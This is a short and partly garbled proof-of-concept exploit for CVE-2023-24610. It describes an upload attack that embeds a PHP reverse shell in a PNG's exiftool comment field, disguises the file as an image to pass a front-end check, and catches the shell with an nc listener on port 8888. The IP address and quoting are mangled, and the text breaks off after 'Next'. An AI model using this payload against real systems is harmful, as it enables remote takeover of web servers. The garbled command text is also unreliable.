This is a proof of concept for CVE-2023-24610
CVE-2023-24610 This is a proof of concept for CVE-2023-24610 We start by creating a polyglot file using exiftool: exiftool -Comment="/dev/tcp/1721701/8888 <&1\''); ?>" avatarpng -o polyglotphp We change the file to png so it will pass the front-end check After that, we start a nc listener on port 8888 to receive the shell Next